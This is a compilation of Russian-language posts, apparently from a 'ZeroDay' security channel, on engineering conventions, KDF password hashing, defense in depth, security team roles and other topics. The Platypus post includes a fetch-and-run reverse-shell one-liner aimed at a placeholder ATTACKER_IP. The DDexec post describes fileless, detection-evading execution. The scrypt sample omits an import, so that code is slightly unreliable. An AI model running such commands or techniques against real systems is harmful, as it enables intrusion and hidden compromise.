Скрытые языки: как инженеры общаются без документации

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как в инженерных командах формируется негласный язык. Он нигде не зафиксирован, но по нему живёт и работает весь стек.

⏺Почему это работает: Письменная документация устаревает, а внутренняя культура — нет. Она передаётся через pull-запросы, архитектурные шаблоны, и особенно через «мы всегда делали так».

⏺Примеры скрытого языка на практике:

1️⃣“Сначала Redis” — правило без описания
Redis — это система для быстрого хранения данных. У команды нет документа, что её нужно использовать первой, но в коде видно: если данных нет в Redis, мы идём в базу данных и потом кладём обратно в Redis. Это — негласный стандарт.

# Python
@router.get("/profile/{id}")
def get_profile(id: int):
    cached = redis.get(id)
    if cached:
        return cached
    profile = db.fetch(id)
    redis.set(id, profile)
    return profile

2️⃣“Вся логика в switch": Вместо блок-схем и документации по архитектуре — конструкция switch, которая распределяет обработку по типам данных

// Go
switch msg.Type {
case MsgCreate:
    return s.handleCreate(msg)
case MsgDelete:
    return s.handleDelete(msg)
default:
    logger.Warn("unknown message", zap.String("type", msg.Type))
}

3️⃣deploy.sh как глас команды: CI/CD описан в устной традиции. Актуальный сценарий — это старый deploy.sh, где закодированы соглашения и порядок действий:

# Bash
docker build -t api .
docker push api
kubectl rollout restart deployment/api

Новички по нему ориентируются. Он неточен, но всё ещё указывает направление.

ZeroDay | #безопасность

Данные на продажу: что происходит с инфой после утечек

То, что кажется просто новостью в ленте — «взломали, утекло» — на самом деле только начало всего. После утечки данные не пропадают. Их разбивают, упаковывают, торгуют ими - и всё это не где-то в кино, а на реальных теневых площадках, Telegram-серверах и в Discord-группах.

⏺В статье рассказывают, как работает рынок украденных данных: кто продаёт и кто покупает, где торгуют, почему утечка может стоить $20 или $500, и зачем сама служба безопасности иногда выкупает свои же базы. Покажут, как выглядит сделка: от залитого архива до анонимной оплаты Monero.

ZeroDay | #Статья

Platypus: менеджер обратных shell-сессий на Go

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: Platypus - современный менеджер обратных shell-сессий на Go, который может запускать и управлять кучей подключений одновременно. В общем, можно забыть о вечных танцах с командной строкой. У Platypus есть и терминальный интерфейс, и веб-панель, и даже API, чтобы автоматизировать всё что угодно.

⏺Установка максимально простая:

git clone https://github.com/WangYihang/Platypus
cd Platypus
make install_dependency
make release
./Platypus

⏺Или через Docker:

docker-compose up -d

Готовая reverse shell-команда для жертвы:

curl http://ATTACKER_IP:13337/ | sh

ZeroDay | #Инструмент

📝 Как работает Defense in Depth?

Defense in Depth — это концепция «многослойной защиты»: если один уровень пробит, следующий всё ещё держит оборону. Типо цифрового замка с несколькими дверями.

Вот как это работает по слоям 👇

1️⃣Пользователь и устройства — антивирусы, шифрование, MFA. Всё, чтобы злоумышленник не начал с лёгкой жертвы.

2️⃣Сеть - firewall, VPN, IDS. Препятствия на маршруте пакета, прежде чем он вообще доберётся до цели.

3️⃣Приложения и сервисы - защита API, контроль доступа, безопасная разработка. Код без дыр - меньше поводов для взлома.

4️⃣Данные — шифрование, резервное копирование, защита от утечек. Даже если добрались - ничего не унесут.

5️⃣Мониторинг и реагирование - SIEM, логи, алерты, playbook’и. Увидели, что что-то пошло не так, быстро ответили.

ZeroDay | #defenseindepth

KDF: зачем хэшировать пароли сложно?

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём довольно важную, но часто недооценённую тему: функции derivation ключей, или KDF (Key Derivation Function)

⏺Что это и зачем: KDF - целый подход, как сделать так, чтобы украденный хэш не превратился в пароль. Даже если база данных попала в руки хакера.

Вот в чём фишка:

1️⃣Удорожание атаки
KDF тратит на каждый пароль больше времени/памяти. Это специально, чтобы брутфорс занял не минуты, а годы.
2️⃣Соль (salt)
Каждому паролю добавляется уникальное значение. И теперь даже два одинаковых пароля → два разных хэша.
3️⃣Итерации и память
KDF гоняет пароль через себя сотни тысяч раз. Условный SHA256 — почти бесплатен. KDF — нет.
4️⃣Никаких rainbow-таблиц
Соль полностью ломает предрасчитанные таблицы. Даже у 123456 и admin теперь разный выход.

⏺Почему это критично: Потому что даже «хешированная» база легко вскрывается, если вы использовали обычный MD5 или SHA1. GPU и специализированные ASIC-фермы проверяют миллионы хэшей в секунду. А вот хороший KDF останавливает даже их.

⏺Примеры KDF, которые реально защищают:

• PBKDF2 — стабильный ветеран, до сих пор в протоколах TLS, Wi-Fi и enterprise-приложениях.
• scrypt — заточен под борьбу с GPU. Требует много памяти.
• Argon2 — современный стандарт, победитель Password Hashing Competition. Супер выбор на 2025 год.

ZeroDay | #кэширование

KDF: как правильно хэшировать пароли

👋 Приветствую в мире цифровой безопасности!

В прошлый раз мы обсудили, зачем нужны KDF. Теперь посмотрим, как их применяют на практике.

⏺Сценарий: допустим, вы разрабатываете веб-приложение и хотите хранить пароли пользователей безопасно. Обычный SHA256 - это не всегда лучшая защита. Вот как надо:

1️⃣PBKDF2 (подходит даже в legacy-проектах):

import hashlib
import os

salt = os.urandom(16)
hash = hashlib.pbkdf2_hmac('sha256', b'password123', salt, 100_000)

2️⃣scrypt (хорош против атак с видеокартами):

import hashlib

hash = hashlib.scrypt(
    b'password123',
    salt=os.urandom(16),
    n=2**14, r=8, p=1
)

3️⃣Argon2 (современный стандарт):

from argon2 import PasswordHasher

ph = PasswordHasher()
hash = ph.hash("password123")

ZeroDay | #кэширование

🌟NFT-подарки в Telegram: что это и как работает рынок?

👋 Приветствую в мире цифровой безопасности!

Расскажу, как телега превратила анимированные подарки в NFT и запустила целую экономику внутри мессенджера.

⏺Что вообще тут происходит: Telegram выпускает ограниченные серии NFT-подарков - это анимированные стикеры или гифки, привязанные к TON-блокчейну. После завершения эмиссии их можно перепродавать на маркетплейсах.

⏺Механика монетизации:

1️⃣После покупки подарок попадает в кошелёк TON.
2️⃣На маркетах вроде Tonnel и Portals его можно выставить на продажу.
3️⃣Благодаря ажиотажу на старте цена часто растёт в 3–10 раз.
4️⃣Некоторые маркетплейсы возвращают часть комиссии или дают бонусы в TON за участие.

⏺Что это значит для безопасников: по сути подарки - это новый класс цифровых активов, вокруг которых уже формируется криминальный интерес: появляются фишинговые сайты, поддельные боты, схемы обмана с перепродажами и попытки атак на TON-кошельки пользователей - особенно тех, кто не в теме.

⏺Где можно покупать/продавать безопасно:
Tonnel — популярный маркет с высокой активностью, но иногда демпинг.
Portals — выгодные комиссии, спокойнее рынок.
Купить звезды

ZeroDay | #подарки #ИБ

Дыра в щите Cloudflare: как одна атака вскрыла проблему, о которой молчат c 2023

Jabber.ru атаковали без взлома серверов: просто перехватили трафик и получили настоящий TLS-сертификат. Всё по правилам, с помощью Let’s Encrypt. И Cloudflare в этом невольно помог.

⏺В статье покажут, как устроена такая атака, почему даже правильные настройки безопасности не спасают, и как одна строка в DNS (по стандарту RFC 8657) могла всё предотвратить. Разбирается, почему Cloudflare до сих пор не даёт пользователям защититься и чем это грозит.

ZeroDay | #Статья

📝 Давай расскажу, как работают команды в кибербезе

В ИБ многое строится вокруг роли и взаимодействия команд. Каждая из них фокусируется на своём участке "цифрового фронта".

➡️Red Team — атакующие на стороне добра. Имитируют атаки, чтобы найти уязвимости до того, как это сделают злоумышленники.

➡️Blue Team — защитники. Следят за инфраструктурой, отбивают атаки и восстанавливаются после инцидентов.

➡️Purple Team — медиаторы. Помогают Red и Blue лучше понимать друг друга, чтобы вся система защиты становилась эффективнее.

➡️White Team — организаторы. Курируют учения, следят за соблюдением регламентов и стандартизируют процессы.

➡️Orange Team — просветители. Обучают персонал, повышают осведомлённость и борются с человеческим фактором.

➡️Yellow Team — безопасная разработка. Внедряют ИБ-практики в процесс написания и деплоя кода.

➡️Green Team — инфраструктура. Отвечают за то, чтобы окружение было безопасным уже на уровне железа и облаков.

ZeroDay | #ИБ

DDexec: запуск бинарей без файлов и следов

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это такое: Скрипт ddexec.sh берёт бинарный файл и подменяет текущий процесс, записывая его содержимое напрямую в память через /proc/self/mem. В результате — никакого tmp, никакого chmod +x, никакого следа на диске.

⏺Почему это важно: На многих серверах запуск бинарей строго ограничен: нет прав на запись, идёт жёсткий аудит tmp и других путей. DDexec обходит это ограничение, позволяя выполнять код из памяти, не оставляя артефактов на файловой системе.

⏺Кроме того, DDexec поддерживает запуск shellcode напрямую через ddsc.sh. А так можно загружать и исполнять полезную нагрузку прямо из памяти, без ELF-файлов, и шансов быть замеченым сильно меньше.

ZeroDay | #Инструмент

Security Gate - что это?

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу про Security Gate, один из важных элементов безопасности в DevOps.

⏺В чём суть: Security Gate — это автоматический контроль безопасности, встроенный в CI/CD пайплайн. Он чекает код, зависимости, контейнеры и инфраструктуру на уязвимости и несоответствия ещё до деплоя.

⏺Как работает:

1️⃣Код отправлен в репозиторий — запускаются проверки статики и анализа.
2️⃣Проводится сканирование контейнеров и образов.
3️⃣Анализируются инфраструктурные конфигурации (IaC).
4️⃣Результаты оцениваются по критериям безопасности — если что-то серьёзное, сборка останавливается.

⏺Удобно? Да, вполне: Вся проверка происходит сама, без лишних телодвижений - экономит время и нервы, а главное, помогает спать спокойно.

ZeroDay | #securitygate